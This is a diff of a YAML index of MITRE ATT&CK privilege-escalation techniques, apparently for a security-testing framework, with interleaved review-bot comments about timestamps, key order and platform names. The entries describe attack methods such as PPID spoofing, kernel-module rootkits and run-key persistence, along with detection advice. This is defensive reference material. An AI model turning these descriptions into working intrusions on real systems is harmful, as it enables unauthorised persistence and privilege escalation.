- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -19888,7 +20212,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -19946,7 +20269,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
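Review bot: the `modified` timestamp on this object moves backwards, from `'2022-05-24T14:00:00.188Z'` to `'2022-05-03T02:15:42.360Z'`, and the same happens for VDSO Hijacking, Emond, Services File Permissions Weakness, Kernel Modules and Extensions and KernelCallbackTable further down; every old value shares the `T14:00:00.188Z` suffix. That pattern suggests the previous values were synthetic and the new ones come from the upstream STIX data, which is fine, but state that in the commit message so the regression in `modified` is not mistaken for a merge of stale objects.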
@@ -19971,12 +20294,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -20002,7 +20324,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -20016,7 +20337,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -20043,8 +20363,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -20055,7 +20375,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
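Review bot: for T1546.001 the relocated keys land after `object_marking_refs` (`+ x_mitre_attack_spec_version: 3.2.0` / `+ x_mitre_modified_by_ref: ...` here), whereas for T1098.001 the same two keys were inserted after `kill_chain_phases` and `x_mitre_is_subtechnique`. Objects emitted with differing key order will churn on every regeneration; if the generator is passing through upstream key order, consider sorting keys or pinning a fixed order before serialising to YAML.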
@@ -20126,7 +20447,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20153,7 +20474,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20193,7 +20513,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20213,12 +20533,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20272,11 +20591,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20363,9 +20681,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20378,12 +20696,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20419,16 +20736,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
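Review bot: the `x_mitre_platforms` edit collapses `Azure AD`, `Office 365` and `Google Workspace` into `Office Suite` and `Identity Provider` alongside the version bump to `'2.7'`. Anything downstream that buckets techniques by platform name will now file T1098 only under the new names, so verify that derived per-platform listings were regenerated in the same change rather than still carrying rows keyed on the old platform names.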
@@ -20469,143 +20785,141 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
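Review bot: the removal of `spec_version: '2.1'` at the end of this T1547.006 block, repeated in every later hunk of this file, drops a property that STIX 2.1 lists as required on every domain object; if any consumer loads these `technique:` blocks as STIX, confirm the regenerated upstream bundle really omits it rather than this being a serializer regression. In the same hunk, the deleted description and x_mitre_detection paragraphs (Linux header installation, `kextload` and `KextPolicy` monitoring) and the `kill_chain_phases`, `x_mitre_data_sources` and `x_mitre_permissions_required` lists are only acceptable as deletions if they are re-emitted under reordered keys earlier in the block, which the visible context does not show.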
@@ -20642,7 +20956,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
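Review bot: the `modified` timestamp for T1574.013 moves backwards here (`'2022-05-11T14:00:00.188Z'` to `'2022-03-22T15:47:33.915Z'`), and the same regression appears for T1068 (2023-10-31 to 2023-04-07), T1134.005 (2022-04-25 to 2021-02-09) and T1037.003 (2021-04-29 to 2020-03-24) further down; a regeneration from a newer ATT&CK release would not normally yield older timestamps, so confirm which STIX bundle the generator was pointed at before merging.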
@@ -20668,12 +20982,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -20751,9 +21063,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -20820,7 +21131,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -20894,11 +21204,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -20915,7 +21224,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -20925,7 +21233,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -20934,19 +21242,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
